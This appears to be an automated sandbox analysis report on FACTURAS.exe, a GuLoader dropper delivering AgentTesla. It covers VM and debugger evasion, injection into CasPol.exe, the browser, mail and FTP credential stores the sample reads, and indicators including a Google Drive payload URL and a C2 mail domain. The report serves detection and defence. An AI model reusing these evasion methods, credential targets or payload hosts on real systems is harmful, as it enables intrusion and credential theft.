Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\FACTURAS.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CasPol.exe, 00000005.00000002.29205726663.0000000001450000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=11UPSPASQ_HHO9RISHTDNOTSECFD2CZSI
Source: FACTURAS.exe, 00000001.00000002.24599167037.0000000002C40000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: FACTURAS.exe, 00000001.00000002.24599167037.0000000002C40000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29205726663.0000000001450000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: FACTURAS.exe, 00000001.00000002.24596626412.00000000006ED000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6596

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 5_2_013665E8 smsw word ptr [eax]

5_2_013665E8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9954

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 5_2_0104EA80 sgdt fword ptr [eax]

5_2_0104EA80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

System information queried: ModuleInformation

Jump to behavior

Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000005.00000002.29205726663.0000000001450000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=11UpsPasq_HHo9riShtDnotSECFd2czsi
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: FACTURAS.exe, 00000001.00000002.24596626412.00000000006ED000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000005.00000002.29204294337.0000000001276000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.29204597889.00000000012AA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000005.00000002.29203974975.0000000001238000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(
Source: FACTURAS.exe, 00000001.00000002.24599167037.0000000002C40000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29205726663.0000000001450000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: FACTURAS.exe, 00000001.00000002.24599285509.0000000002D09000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000005.00000002.29207543959.0000000002F29000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: FACTURAS.exe, 00000001.00000002.24599167037.0000000002C40000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\FACTURAS.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 5_2_01046950 KiUserExceptionDispatcher,LdrInitializeThunk,

5_2_01046950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\FACTURAS.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"			Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"			Jump to behavior

Source: CasPol.exe, 00000005.00000002.29207023162.0000000001AD1000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000005.00000002.29207023162.0000000001AD1000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: CasPol.exe, 00000005.00000002.29207023162.0000000001AD1000.00000002.00020000.sdmp	Binary or memory string: \|Program Manager
Source: CasPol.exe, 00000005.00000002.29207023162.0000000001AD1000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1268, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1268, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1268, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Masquerading1	OS Credential Dumping2	Security Software Discovery421	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	Credentials in Registry1	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion361	Security Account Manager	Virtualization/Sandbox Evasion361	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol123	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery115	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FACTURAS.exe	13%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.FACTURAS.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File
1.2.FACTURAS.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File

Domains

Source	Detection	Scanner	Label	Link
furteksdokuma.com.tr	0%	Virustotal		Browse
mail.furteksdokuma.com.tr	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://furteksdokuma.com.tr	0%	Avira URL Cloud	safe
https://Z655gVkuIZnhDyQfI.nett-	0%	Avira URL Cloud	safe
http://mail.furteksdokuma.com.tr	0%	Avira URL Cloud	safe
https://Z655gVkuIZnhDyQfI.net	0%	Avira URL Cloud	safe
http://kFWRbv.com	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.186.174	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.129	true	false		high
furteksdokuma.com.tr	116.202.203.61	true	true	0%, Virustotal, Browse	unknown
mail.furteksdokuma.com.tr	unknown	unknown	true	0%, Virustotal, Browse	unknown
doc-0c-6k-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0c-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1oltsnuahdkbclh0bd9255sdi/1638361575000/11612195336931281153/*/11UpsPasq_HHo9riShtDnotSECFd2czsi?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	CasPol.exe, 00000005.00000002.29204489618.0000000001299000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29221772369.00000000203D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	CasPol.exe, 00000005.00000002.29203974975.0000000001238000.00000004.00000020.sdmp	false		high
https://doc-0c-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1	CasPol.exe, 00000005.00000003.24573939884.00000000012F1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.29204597889.00000000012AA000.00000004.00000020.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 00000005.00000002.29216365649.000000001E247000.00000004.00000001.sdmp	false		high
http://furteksdokuma.com.tr	CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://Z655gVkuIZnhDyQfI.nett-	CasPol.exe, 00000005.00000002.29216704229.000000001E298000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://mail.furteksdokuma.com.tr	CasPol.exe, 00000005.00000002.29216862860.000000001E2AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://Z655gVkuIZnhDyQfI.net	CasPol.exe, 00000005.00000002.29216704229.000000001E298000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.25508640034.000000001CFE1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
